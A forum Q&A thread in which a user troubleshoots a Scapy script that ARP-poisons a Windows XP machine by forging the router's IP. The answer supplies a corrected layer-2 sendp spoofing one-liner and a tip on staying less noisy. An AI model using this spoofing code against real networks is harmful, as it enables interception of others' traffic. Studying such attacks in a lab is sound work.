Reputation: 307
Scapy arp poisoning not working for me
I am attacking a Windows XP machine with Backtrack 5 using scapy.
Now that's my code:
#! /usr/bin/env python
from scapy.all import *
arp_p = ARP(op = 1, psrc = "192.168.0.1", pdst = "192.168.0.106", hwsrc = "00:0c:29:f0:2d:19", hwdst = "ff:ff:ff:ff:ff:ff)
send(arp_p)
The code above actually sends two packets for some reason. One time my backtrack mac is asking:
who has 192.168.0.106 (Victim's IP)? Tell 192.168.0.108 (Backtrack's IP - NOT SUPPOSED TO BE!).
Then he gets the "is at" answer from the victim.
And the second time my backtrack's mac is asking:
who has 192.168.0.106 (Victim's IP)? Tell 192.168.0.1 (The router's IP).
Then he gets the "is at" answer from the victim again.
Then the victim's ARP table has to lines of the same mac but different IPs, one is the Backtrack's real IP and the second is the router's IP.
Why is this happenning?
Upvotes: 0
Views: 1907
Answers (1)
Reputation: 6237
The first ARP packet you see comes from Scapy, because it wants to fill the Ether frame with the Victim's MAC address before send()-ing your ARP packet.
If you don't want that to happen, try (sendp sends at layer 2):
>>> sendp(Ether(dst=ETHER_BROADCAST)/ARP(psrc = "192.168.0.1", pdst = "192.168.0.106"))
You can replace ETHER_BROADCAST with your victim's MAC address, that's less "noisy".
Upvotes: 1
Related Questions
- Python Scapy --arp request and response
- Scapy ARP mistake
- Scapy is not working when IP is used as range in the ARP packet
- Detect ARP poisoning using scapy
- Scapy ARP Poisoning
- ARP Poisoning with scapy: Failure to get target MAC
- Scapy not picking up a single ARP request
- Python-3.4 Scapy Sending ARP packet
- Python 2.7 -scapy and ARP
- ARP missing from the module scapy